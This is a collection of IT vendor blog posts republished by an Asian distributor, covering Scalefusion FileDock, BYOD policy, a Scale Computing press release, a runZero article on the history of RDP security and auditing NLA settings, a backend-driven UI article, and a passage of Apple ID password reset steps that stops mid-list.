September 2024 - Version 2 Limited

Enhancing Content Management with Scalefusion FileDock for Windows Devices

Imagine you’re an IT administrator at a rapidly growing tech firm. Each day, you juggle the demands of securely managing and distributing a vast array of digital content across hundreds of devices; the pressure is uncanny.

According to a recent study, the global mobile content management market, valued at USD 2.48 billion in 2022, is projected to grow at a compound annual growth rate (CAGR) of 22.2% from 2023 to 2030^[1]. In such a dynamic scenario, efficient content management is not just a luxury—it’s a necessity.

Enter Scalefusion FileDock, an innovative application designed to streamline content management on Windows devices. This powerful tool extends Scalefusion’s kiosk feature set, providing a secure gateway for IT admins to upload, manage, and distribute content seamlessly from a central dashboard.

This blog will explore how FileDock revolutionizes enterprise content management, its key features, and real-world applications. Discover how this essential tool can enhance your organization’s efficiency and security in the ever-evolving modern workspace.

What is Scalefusion FileDock?

Let’s understand the core concept of Scalefusion FileDock for Windows.

FileDock’s Primary Function

Scalefusion FileDock is an enterprise application designed to enhance content management on managed Windows devices. It serves as a secure gateway, allowing IT administrators to upload, manage, and distribute content directly from the Scalefusion dashboard to managed Windows devices. By integrating seamlessly with the Scalefusion ecosystem, FileDock ensures that any content uploaded via the Windows content management module is accessible only through the FileDock app on the device, maintaining high security and control over distributed content.

Core Features

a. Secure Content Upload and Distribution

FileDock provides a secure platform for uploading various types of content, including files, folders, presentations, and multimedia. Once uploaded, content is distributed over the air directly to the devices, ensuring that all data remains secure during transmission.

b. Content Categorization

FileDock categorizes content into different types such as documents, pictures, videos, music, and others. This categorization simplifies content organization and retrieval for end-users, allowing them to quickly find and access the necessary files.

c. User-friendly Interface

The FileDock application features an intuitive interface similar to traditional file explorers. It includes:

Menu Bar: Options to sync files, view logs, and access help.
Left Panel: Lists file categories.
Main Section: Displays the list of files based on selected categories.
Toolbar: Includes search, filter, and sync options.
Status Bar: Shows the total number of items and other relevant information.

d. Advanced Security Features

FileDock enhances security by restricting content sharing, applying file expiry settings, and supporting secure content distribution protocols. Administrators can define additional locations for file storage and set specific expiry periods to ensure content is automatically removed after a certain time.

e. Remote Management Capabilities

FileDock allows IT admins to manage content remotely, making it ideal for distributed work environments. Admins can push updates, publish new content, and manage existing files without needing physical access to the devices.

f. Presentation Mode for Digital Signage

In addition to content management, FileDock can run presentations and turn Windows devices into digital signage kiosks. This feature is useful for marketing and information dissemination in public spaces.

Content Management with FileDock

Let’s discover how you can efficiently manage content with FileDock.

1. Empowering IT Administrators

FileDock revolutionizes how IT administrators manage and distribute content across multiple devices from a centralized location. Using the Scalefusion dashboard, admins can effortlessly push new content, manage existing files, and update applications on all enrolled devices. This centralized control eliminates the need for physical access, making content management efficient and seamless.

2. Streamlined Content Delivery

FileDock allows IT admins to remotely transfer files to Windows desktops. This means that whether it’s a critical information update, a company-wide policy document, or training materials, admins can ensure that all devices receive the necessary content without delay. This capability is crucial for maintaining operational consistency and ensuring all users have the latest resources.

3. Real-Time Updates

One of the standout features of FileDock is the ability to perform real-time updates. This ensures that all managed devices are always up-to-date with the latest content. The endpoint users can access required content instantly with FileDock, avoiding unwanted delays.

4. Enhanced Security Protocols

FileDock places a strong emphasis on security, incorporating advanced protocols to safeguard sensitive information. Admins can control who has access to what content, setting permissions and restrictions to prevent unauthorized sharing or viewing. This is particularly important for protecting proprietary information and ensuring that sensitive data does not fall into the wrong hands.

5. Granular Control with File Expiry

To further enhance security, FileDock allows admins to set expiry dates for files. This means that content will automatically become inaccessible after a specified period, reducing the risk of outdated or sensitive information lingering on devices. This feature is particularly useful for managing temporary projects or time-sensitive information that should not remain accessible indefinitely.

6. Customized Download Locations

IT admins can define custom locations for downloading files, providing an additional layer of control over where data is stored. This flexibility allows organizations to enforce data storage and access policies, ensuring that files are stored in secure, approved locations and reducing the risk of data breaches.

7. Comprehensive Audit Trails

FileDock also supports comprehensive logging and audit trails, enabling IT admins to track all content-related activities. This includes who accessed which files, when updates were made, and any changes to permissions or settings. These logs are invaluable for maintaining accountability and ensuring compliance with regulatory requirements.

Real-world Applications of FileDock App

Scalefusion’s FileDock app provides numerous advantages to different industries. Let’s explore them one by one.

1. Healthcare

Managing sensitive patient information and ensuring regulatory compliance is crucial in healthcare. FileDock enables healthcare providers to securely distribute and manage patient records, treatment plans, and medical imaging files. Hospitals can push updated protocols to Windows devices, ensuring staff have immediate access to the latest information, improving patient care and streamlining operations.

2. Education

Educational institutions benefit by efficiently managing and distributing content to students and faculty. Universities can push curriculum updates, lecture notes, and multimedia content directly to students’ Windows laptops and desktops, ensuring consistent access to necessary resources and enhancing the learning experience.

3. Retail

Timely and accurate information is vital in retail. FileDock enables retail chains to manage and distribute product information, training materials, and promotional content to store computers. Retailers can push new product information and training videos to store devices simultaneously, ensuring employees are well-informed and providing a consistent customer experience.

4. Vehicle Fleet Management

Real-time data and updates are essential in vehicle fleet management. FileDock helps fleet managers distribute important information such as route changes, maintenance schedules, and compliance documents to vehicles equipped with Windows tablets or laptops. This improves operational efficiency and ensures the fleet operates within regulatory guidelines.

5. Corporate Offices

Large corporations can standardize communication and content distribution. FileDock allows businesses to push corporate policies, training materials, and announcements to all Windows desktops and laptops, ensuring every employee has access to the same information. This is particularly beneficial for compliance with company policies and onboarding new employees.

The Future is Now with Scalefusion FileDock

As the business perspective evolves, staying ahead requires tools that are not just functional but transformative. Scalefusion FileDock is not just another content management solution—it’s a gateway to a more efficient, secure, and streamlined way of handling your digital content assets. Imagine a world where every file, every update, and every piece of critical information is just a click away, securely delivered to all your devices, no matter where they are.

With Scalefusion FileDock, the future of content management is not just a possibility; it’s here. Embrace the power of seamless integration, strong security, and unparalleled efficiency. Ready to revolutionize how you manage content? The next step is yours to take.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Scalefusion
Scalefusion’s company DNA is built on the foundation of providing world-class customer service and making endpoint management simple and effortless for businesses globally. We prioritize the needs and feedback of our customers, making sure that they are at the forefront of all decision-making processes. We are dedicated to providing comprehensive customer support services, and place emphasis on customer-centric thinking throughout the organization.

2024 Scalefusion

How a BYOD Policy is Protecting Your Organization

As the digital landscape continues to evolve, organizations are increasingly adopting “Bring Your Own Device” (BYOD) policies. Allowing employees to use their personal devices for work fosters flexibility and boosts productivity. However, without a well-structured approach, BYOD can expose organizations to numerous cybersecurity risks. A strong BYOD policy is not just a set of guidelines; it’s a critical framework designed to protect sensitive data, mitigate threats, and ensure compliance. By recognizing the importance of a comprehensive BYOD policy, organizations can turn potential vulnerabilities into fortified defenses.

Understanding the Imperative for a BYOD Policy

In today’s increasingly mobile and remote working environments, the surge in BYOD adoption is both a boon and a bane for organizations. While employees relish the convenience and flexibility, these advantages are counterbalanced by heightened cybersecurity risks. Without a rigorous BYOD policy, personal devices can become conduits for cyber threats, jeopardizing organizational integrity. A well-structured BYOD policy delineates clear guidelines for device usage, data access, and security protocols, establishing a mutual understanding of responsibilities. This clarity is pivotal in fostering a culture of accountability, wherein employees recognize the gravity of protecting sensitive information. Knowing the dos and don’ts, employees are less likely to inadvertently introduce vulnerabilities, though often times employees use personal devices for work regardless of their organization’s rules or policies regarding BYOD. Furthermore, a BYOD policy acts as a strategic framework for identifying and mitigating risks specific to personal devices. Different devices, operating systems, and applications present unique threats that must be meticulously assessed. With this granular understanding, organizations can implement tailored security measures that substantially reduce the risk of breaches. Equally important is the policy’s role in harmonizing technological defenses with human behavior. An effective BYOD policy ensures that security measures are seamlessly integrated into daily operations, reinforcing the organization’s overall cybersecurity architecture. By embedding the BYOD policy into the core cybersecurity strategy, organizations can better prepare for and respond to increasingly sophisticated cyber threats, safeguarding their digital assets and operational continuity.

Mitigating Cyber Threats Through Stringent BYOD Measures

To bolster an organization’s defenses, a BYOD policy must encompass rigorous measures designed to mitigate cyber threats. Central to this strategy is the enforcement of strong authentication protocols. Mobile Device Management (MDM) solutions empower IT teams to remotely monitor, manage, and secure employee devices. 87% of companies rely on employee access to mobile business apps via personal smartphones. MDM facilitates the enforcement of encryption standards, the installation of critical security updates, and the remote wiping of data from lost or compromised devices. These capabilities are essential for ensuring that all personal devices adhere to the organization’s stringent security criteria. Equally critical is the provision of comprehensive cybersecurity training for employees. Awareness training educates staff on recognizing potential threats such as phishing attempts and malware infections, fostering a culture of vigilance and proactive defense. By equipping employees with this knowledge, organizations fortify their cybersecurity posture, leveraging human awareness as a key component of their defense strategy. Additionally, implementing endpoint protection measures, such as antivirus software and firewalls, is crucial in shielding personal devices from malware and other malicious attacks. Regular security audits and vulnerability assessments should be conducted to identify and rectify potential weak points within the BYOD framework. These stringent measures, when seamlessly integrated into a cohesive BYOD policy, create a fortified digital environment where both technological defenses and human awareness coalesce to safeguard organizational integrity against the ever-evolving landscape of cyber threats.

Aligning BYOD Policy with Cybersecurity Compliance Standards

In a regulatory environment where adherence to stringent standards is crucial, aligning a BYOD policy with prevailing cybersecurity compliance mandates is indispensable. Organizations are obligated to ensure their BYOD policies conform to rigorous frameworks such as the GDPR, HIPAA, and PCI DSS, among others. By embedding these regulatory requirements into the fabric of the BYOD policy, organizations can preemptively mitigate legal and financial risks. Key elements such as data encryption, secure access controls, and stringent authentication measures are not just best practices but often legally mandated. These components, when integrated into the BYOD policy, not only bolster security but also ensure compliance with industry-specific regulations. The dynamic nature of compliance requires that organizations adopt a continuous improvement mindset. Regular audits and evaluations of the BYOD policy are essential to maintain alignment with evolving regulatory landscapes and emerging cyber threats. This proactive stance allows organizations to stay ahead of compliance requirements while reinforcing their cybersecurity frameworks. Additionally, organizations should consider the synergies between their BYOD policies and broader cybersecurity strategies. By creating a cohesive, compliance-driven approach, organizations can achieve a unified defense mechanism that simultaneously satisfies regulatory demands and fortifies their security posture. Integrating automation into compliance processes further enhances the ability to swiftly adapt to new regulations, thereby ensuring continuous adherence without compromising operational efficiency.

Leveraging Automation in Enforcing BYOD Policies

To keep pace with the escalating sophistication of cyber threats, automation must be integral to enforcing BYOD policies. Automated solutions elevate the efficiency and efficacy of managing personal devices by providing real-time visibility into device compliance. These systems can instantly identify non-compliant devices, prompting swift corrective actions that preclude potential security breaches. Automation also enhances incident response capabilities. When a threat is detected, automated protocols can isolate affected devices, curtailing the spread of malicious activity and minimizing damage. This rapid response is crucial in maintaining organizational integrity against an ever-evolving threat landscape. Further, automating updates and security patches ensures that all devices are continuously protected against the latest vulnerabilities. This eliminates the latency inherent in manual updates, which can expose the organization to unnecessary risks. By maintaining a state of perpetual readiness, organizations not only enhance their security posture but also make optimal use of their cybersecurity budgets. The synergy between automation and BYOD policies extends to regulatory compliance as well. Automated systems can streamline adherence to various cybersecurity standards, ensuring that devices consistently meet compliance requirements. This not only reduces the administrative burden but also fortifies the organization’s defense mechanisms. Embracing automation in BYOD policy enforcement positions organizations to proactively counteract emerging threats, safeguarding their digital ecosystem while optimizing resource allocation. Factors such as the spread of 5G internet access and employee privacy concerns will affect how BYOD might change in the future.

Conclusion

A well-structured BYOD policy is essential for balancing flexibility and security in today’s digital landscape. By establishing clear guidelines, enforcing stringent security measures, and aligning with compliance standards, organizations can protect their sensitive data while fostering productivity. Automation further enhances these efforts by streamlining enforcement and response processes, ensuring that organizations remain agile in the face of evolving cyber threats. With the right BYOD strategy, businesses can turn potential vulnerabilities into opportunities for stronger, more resilient cybersecurity frameworks.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Portnox 2024

Scale Computing Named in 2024 Gartner® Hype Cycle™ for Data Center Infrastructure Technologies

INDIANAPOLIS – September 18, 2024 — Scale Computing, a market leader in edge computing, virtualization, and hyperconverged solutions, today announced it has been recognized as a Sample Vendor in the 2024 Gartner® Hype Cycle™ for Data Center Infrastructure Technologies. We feel this acknowledgment underscores Scale Computing’s commitment to delivering innovative solutions that address the evolving needs of modern data centers.

As organizations increasingly embrace digital transformation, the demand for efficient, resilient, and sustainable data center infrastructure has never been greater. Gartner says, “By 2028, 40% of data center infrastructure will be managed through a cloud-based control plane, an increase from less than 15% in 2023. By 2028, more than 70% of enterprises will alter their data center strategies, due to limited energy supplies, a major increase from less than 5% in 2023.” The Gartner Hype Cycle report highlights the latest innovations designed to help IT leaders enhance business technology platforms and achieve these goals by devising sustainable, secure, scalable, agile, and resilient data center infrastructure at an acceptable cost.

“Scale Computing has long been dedicated to developing innovative solutions that empower businesses to meet their goals in an increasingly complex IT environment,” stated Jeff Ready, CEO and co-founder of Scale Computing. “We are honored to be recognized as a Sample Vendor in the 2024 Gartner Hype Cycle for Data Center Infrastructure Technologies, which provides a valuable framework for IT leaders to understand new technologies and their potential impact on their businesses. To us, this recognition validates our dedication to providing cutting-edge solutions that empower businesses to optimize their data center operations and drive digital innovation.”

Scale Computing Platform brings together simplicity and scalability, replacing existing infrastructure to empower enterprises to run applications and process data outside centralized data centers, at the edge of their networks, closest to where data is created and utilized. With Scale Computing Fleet Manager, the industry’s first cloud-hosted monitoring and management tool built for hyperconverged edge computing infrastructure at scale, customers can quickly identify areas of concern using a single pane of glass, scaling from 1 to over 50,000 clusters. Zero-touch provisioning enables administrators to centrally monitor and manage hundreds or thousands of distributed edge infrastructure deployments with minimal or no on-site IT personnel.

Gartner Hype Cycle reports provide a visual depiction of the maturity and adoption of applications and technologies, providing business leaders with a roadmap for understanding how these technologies are expected to evolve over time. The reports offer insights into the potential of emerging technologies within industries, allowing enterprises to assess their risk tolerance on an individual basis. IT leaders can leverage Hype Cycle reports to uncover the real drivers of a technology’s commercial promise, reduce the risk of technology investment decisions, and assess a technology’s business value objectively based on data from experienced IT analysts. The latest report covers the five phases in the Hype Cycle: Technology Trigger, Peak of Inflated Expectations, Trough of Disillusionment, Slope of Enlightenment, and Plateau of Productivity.

For complimentary access to the 2024 Gartner Hype Cycle for Data Center Infrastructure Technologies and to read the thoughts and expertise of the Gartner analysts who authored the report, visit the Scale Computing website.

Gartner, Hype Cycle for Data Center Infrastructure, by Henrique Cecci, Philip Dawson, 27 June 2024.

GARTNER is a registered trademark and service mark, and HYPE CYCLE is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Scale Computing
Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Scale Computing HC3 software eliminates the need for traditional virtualization software, disaster recovery software, servers, and shared storage, replacing these with a fully integrated, highly available system for running applications. Using patented HyperCore™ technology, the HC3 self-healing platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime. When ease-of-use, high availability, and TCO matter, Scale Computing HC3 is the ideal infrastructure platform. Read what our customers have to say on Gartner Peer Insights, Spiceworks, TechValidate and TrustRadius.

Scale Computing scale computing news 2024

RDP security: The impact of secure defaults and legacy protocols

Microsoft’s Remote Desktop Services (RDS) is a commonly used technology for providing a remote Windows graphical environment. RDS use cases range from merely enabling remote server management all the way to providing full Virtual Desktop Infrastructure (VDI) for enterprises. In this blog, we’ll explore how the network level security controls have evolved to address risks, the reasons why defaults can impact an environment’s security, and using runZero to audit your environment.

In the beginning (abridged)

In 1995, before RDS, Citrix released a multi-user remote desktop product called WinFrame, based on Windows NT 3.51. This was promising enough that Microsoft later licensed the core technology from Citrix and used it to build a product called Terminal Services. It was first released in 1998 as Windows NT 4.0 Terminal Server Edition. In Windows 2000, Terminal Services became a standard Windows feature. After that, nearly every version of Windows Server improved on RDS in some way.

The network protocol used for communication between the RDS client and server is called Remote Desktop Protocol (RDP). The protocol evolved alongside the RDS changes and was the impetus for various improvements. Many of the security controls discussed in this blog are changes to RDP.

Not remotely secure

It will likely surprise no one that a protocol and corresponding implementations from the 1990s and early 2000s had security problems. The impact of these problems grew over time as more organizations started exposing the RDS services directly on the Internet. Some organizations were doing this to enable remote management of servers while others were hosting applications and other services for clients.

The major issues that we’re going to cover here are:

Information disclosure

When a client connected to RDS they would be presented a login screen. By default, the login screen often displayed a list of recent users and Windows Domain or Active Directory that the server was part of. This information could then be used in brute force attacks.

FIGURE 1 – Legacy RDS pre-login screen

Brute force attacks

The client side of the RDP protocol required minimal resources and there were no controls in place to stop attackers from using tools such as Hydra or Ncrack to test various username and password combinations in order to discover valid credentials. While Administrators could configure Windows policies to lock out accounts after a certain number of failed login attempts this precaution often wasn’t enforced for Administrator accounts – admins always had login access.

Denial of service

During the initial client connection and prior to authentication, the server provisioned an entire desktop environment before beginning the login process. This meant that attackers could easily create a resource-exhaustion situation by simply opening a large number of sessions. This could happen accidentally as part of an effort to brute force credentials.

Machine-in-the-Middle

The early versions of RDP were susceptible to Machine-in-the-Middle (MitM) attacks that could enable decryption or modification of RDS session data. They used a form of authentication that is now known to have many weaknesses. The encryption used was a stream cipher named RC4. At the time RC4 was commonly used in various protocols such as WEP, WPA, SSL, and TLS. Today, however, it is known to be broken by multiple techniques and the key sizes are such that modern computers make short work of them. It became so risky that RFC 7465 was drafted in 2015 to prohibit RC4’s use in all TLS versions. Further compounding the RDS risks, RDP allowed keys sizes as small as 40 bits in order to comply with US cryptographic export restrictions.

The issues with authentication didn’t end there. Microsoft’s implementation of the key exchange protocol depended on the client and server creating and exchanging random values. The server’s random value was sent unencrypted over the network. The server also provided a public RSA key that could be used by the client to encrypt the client’s random value so that only the server could read it. Unfortunately, Microsoft baked the same public-private RSA key pair into every RDS host. This key was, predictably, extracted and made public. With that information attackers with network access to RDS communications could decrypt the data and extract authentication and session information. Advanced attackers in the correct network position could intercept and monitor or modify an RDS session in real time.

Shoring up defenses

With the release of Windows 2003 Service Pack 1, Microsoft introduced the ability to use TLS, which addressed the issue of machine-in-the-middle (MitM) attacks by enabling the use of significantly more robust encryption cipher suites and key exchange protocols. This also enabled the protocol to take advantage of improvements in TLS over time instead of being locked into a single algorithm. Additionally, TLS allows clients to cryptographically verify they were connecting to the expected server.

In Windows Server 2008, Microsoft introduced Network Level Authentication (NLA), which required users to authenticate themselves before a session would be established. NLA forced authentication to occur after the TLS handshake, but before the console was provisioned, which mitigated the resource-exhaustion concerns, reduced information leakage, and significantly impaired brute-force attacks. Since information leakage was reduced attackers could no longer collect the names of users, but they could still access the Windows hostname and domain information via the CredSSP authentication process. However, this is still an overall improvement in security. There is one downside to requiring NLA – users can no longer authenticate and change expired passwords. This functionality has to be provided via another mechanism such as a Remote Desktop Gateway.

When configuring RDS in Windows Server 2008, administrators had the option to require NLA for all connections or to allow the client to decide. Starting with Windows Server 2012, however, NLA was required by default to improve security across Windows environments.

Real world impact of NLA by default

We explored our data to determine if requiring NLA by default had a real world impact. In other words, do we see a significant percentage of assets where a less secure option has been enabled for Window Server 2012 and beyond?

The chart below shows the overall percentage of specific Windows operating systems (OS) in our data as well as the breakdown of NLA is enforcement.

FIGURE 2 – Operating system distribution for RDP NLA enforcement.

As the results illustrate, the majority of RDS on Windows Server versions where NLA is required by default do, in fact, require NLA. This is great news. It indicates that secure defaults can have a positive impact on security posture. Another takeaway is that more modern environments are less likely to operational or compatibility requirements that force less secure configurations. An argument could be made that the NLA requirement being disabled by default on Windows Server 2008 / 2008 R2 shows up in the results as well, but this state may be influenced by those servers being more likely to have legacy or third-party clients that don’t support NLA.

We also reviewed the OS distribution of services that did not permit using NLA at all. This list is dominated by Red Hat Enterprise Linux and its various derivatives running the xrdp RDP service. The xrdp service does not currently support NLA, so these results are not surprising. However, we were encouraged to find so few results for Microsoft Windows machines without NLA support that the number is not statistically significant.

FIGURE 3 – Operating system distribution for RDP without NLA support.

Using runZero to audit RDP configurations

At runZero we put a tremendous amount of effort into trying to extract as much information from scan targets as possible, particularly if the information can help us understand the security posture of the device. From RDS services this includes enumerating all of the RDP authentication mechanisms that target supports. Explore our recommendations to audit RDP configurations in your environment.

Attributes of interest

We store RDP authentication attributes on the RDP service of an asset with the prefix rdp.auth. Here are the attributes that can be used to audit your environment to check to see if NLA is enabled or required as well as if standard, legacy RDP authentication is still enabled:

rdp.auth.nla – a value of supported indicates that the target supports NLA (this is good!).
rdp.auth.rdp – a value of supported indicates that the target still allows authentication using the legacy RDP mechanism. (Red flag. It should only really be required if you have very old clients that still need to connect).
rdp.auth.ssl – a value of supported indicates that the target still allows authentication using the TLS. (Somewhere in the middle. This is better than legacy RDP but still weaker than NLA).

In rdp.auth.rdp and rdp.auth.ssl a value of ERROR_HYBRID_REQUIRED_BY_SERVER indicates that the authentication mechanism is not supported and NLA is required. This is the desired state.

Within runZero you can use a Service inventory search to audit your environment. To find assets supporting legacy RDP authentication you can use the following search criteria:

protocol:rdp and _service.rdp.auth.rdp:="supported"

To find assets supporting either legacy RDP or SSL the following Service inventory search criteria can be used:

protocol:rdp and (_service.rdp.auth.rdp:="supported" OR _service.rdp.auth.ssl:="supported")

A glance into the near future

An interesting recent development is the introduction of Remote Desktop (using the RDP protocol) to both the Gnome and KDE desktop environments. In both cases Remote Desktop is a full fledged, native feature. Based on the currently released code, it appears that the implementations support NLA and do not support either the legacy RDP or SSL protocols. We will be monitoring the growth of these implementations over time and look forward to sharing more insight on that in the future.

Final Thoughts

Thankfully, the security of Microsoft’s RDS has improved over time. As with many such improvements, the benefits are lost if the new features are not implemented. In this case, Microsoft made the pragmatic decision for the most secure option to also be the default and we can measure the real world impact. In short, secure-by-default matters.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

runZero 2024

Backend-driven UI: Fast A/B testing and unified clients

Backend-driven UI is a fresh approach to user interface development that hasn’t gotten much attention in UI design circles. The reasons for that include high upfront costs and the dominance of frontend-driven setups. However, there’s much more to the story.

As a Senior Frontend Engineer at NordLayer, I recently dove into BDUI to see what makes it stand out. In this article, I’ll break down where UI development is now and how adding more server-side power could improve the usual frontend-focused methods.

Frontend-only UI development

Imagine a simple UI feature, like the banner at the top of a page. How does our team create this banner? Let’s take a look at the 6-step development lifecycle for a single feature.

A basic development cycle for a UI feature.

Development starts with requirement gathering, where the product owner (PO) outlines the desired functionality of the UI element. In this case, we want it to display a static message. So we design the banner, and as it’s a frontend-only feature, we may skip backend development and go straight into frontend development, then testing. After that, there’s only one step left – deployment. That’s it – the job’s done…

… or is it?

Emphasizing the backend’s role

Let’s say this whole process takes a week, depending on your setup. But features don’t simply stay the same indefinitely – we iterate upon them.

For example, we’d like to show a different message for the second iteration. However, realizing that the message will change a lot, we’d move its management to the backend. To ensure a smooth integration between departments, the backend engineers build an API and provide it to the frontend team. After testing and deployment, everything’s ready to go.

Let’s iterate further. Now we want to deliver tailored messages to different user segments, as part of an A/B testing strategy. The beautiful part? No more frontend changes required! The frontend’s role now is simply to call the backend to retrieve the display message. Our UI approach is now effectively ‘backend-driven,’ enabling faster iterations and more flexible content management and delivery.

The goal of backend-driven UI

Simply stated, backend-driven UI aims to make user interfaces a function of state.

Spotify expressed BDUI as UI = fn(state) in one of its early talks on the subject. This distills the idea beautifully. What we’re trying to achieve here is making the interface depend entirely on the state provided to it. Imagine a webpage structured using JSON data objects, which in our case, become the state. Each object represents a component on the frontend client.

A mobile UI defined by JSON components.

The benefits of backend-driven UI

Redesigning our interface becomes streamlined: This can be achieved by simply changing the order of our objects. We can also add components without any frontend redeployment.

Backend-driven UI allows us to unify our client approach because this state can be used to populate any client, whether it’s mobile, desktop, or otherwise. This way, users get new features at the same time, regardless of what client they’re using. In terms of development, this helps developers across various teams follow a similar workflow.
Easier A/B testing. All we need to focus on is how to deliver different states based on user feedback, and with that, we can get really flexible when conceptualizing and experimenting with new UIs.

The cons of backend-driven UI

Uneven developer distribution

As mentioned before, every useful software development approach will have downsides. Implementing backend-driven UI means migrating all logic from the frontend. Naturally, this will result in higher workloads for backend developers. Keeping that in mind, does the usual developer distribution change when using this approach? Generally, yes, but this ultimately depends on the product/app/service you’re building. Some are already more backend-heavy than others.

Workload will vary depending on the stage of implementation. When starting with backend-driven UI, designing the architecture, agreeing on the contract, and executing the switch is heavily dependent on all engineers. Questions mostly arise when the migration is complete. From then on, backenders will have bigger workloads.

High cost

The upfront cost of introducing backend-driven UI can be significant. When making a UI reliant only on the state provided to it, the implementation can quickly become overcomplicated. This impacts the pace of development. It’s not an easy task, but we’re trading high upfront costs for being faster and more flexible in the future.

You should first consider whether this approach is even useful for your specific business. Spotify popularized this approach because it wanted the ability to experiment fast and flexibly with novel UI features. But if you’re building an admin panel, does it need to be backend-driven? Will the interface change a lot, or will you be conducting A/B tests for the users? Implementing BDUI should align with your tech setup and business goals.

Sanity check: Is BDUI for you?

With the pros and cons in mind, let’s address some common questions:

How much should you commit initially?

Backend-driven UI doesn’t need to replace the entire system. You can also take a modular approach when determining viability. As an example, you can identify specific parts of the application that you could make backend-driven. The banner example that we discussed above could be something to start with. If that works, try it out on a more challenging feature like a table or carousel.

Are we inventing HTML again?

Avoid being too detailed. Taking a simple feature like a text box, we could go overboard and start thinking about allowing different text colors, size changes, or other modifications… But then we’d come dangerously close to CSS and HTML, which is certainly not the goal! Remember: Enable backend-driven UI using general components, not detailed blocks.

Do we have the foundation to implement a backend-driven UI?

Do you have a design system? As we said above, being too detailed will cause problems. With a design system in place, we have a very clear direction on where to go. Development becomes very logical as long as our frontend can handle our designed components. Everyone uses the same components to describe UIs: Whether you’re a mobile developer, frontender, or designer, we all speak the same language. A button means the same component across different contexts.

Big Tech and backend-driven UI

Most of this article’s content is based on findings from Lyft, Spotify, Airbnb, and others. These are huge companies with the resources to make backend-driven UI a reality.

And even though BDUI can be a pricy upfront investment that requires developer redistribution, its long-term benefits – including flexibility and faster adaptation to user feedback – are a huge upside for many teams, products, and apps.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Nord Security NordLayer 2024

Forgot your Apple ID password? Here is how you can reset it.

Before you reset your Apple ID password

Before you go about resetting or changing your Apple ID password, it’s important to have all the necessary information for the process. Here’s what you’ll need:

Email address: Make sure you have access to the email address that you’ve used with your Apple ID.
Security questions: Have answers ready to any security questions if required.
Multi-factor authentication (MFA): If you’ve enabled MFA, ensure you have access to the trusted device or phone number.
Recovery email or phone number: If you’ve set up a recovery email or phone number, ensure you can access it.

On top of that, it is also crucial to note that Apple has a set of specific requirements for passwords, including:

A password has to be at least eight characters long.
A password must include a number.
A password must include both uppercase and lowercase letters.

How to reset your Apple ID password on iPhone and iPad

Go to “Settings” and tap on your name.
Select “Sign-In & Security.”
Tap “Change password.”
Enter your device’s passcode. Then, enter your new password and confirm it.
Tap “Change” or “Change Password.”

How to reset your Apple ID password on a Mac

Click on Apple’s logo at the top left of your screen.
Select “System Preferences” and click on your name.
On the left, select “Sign-In & Security.”
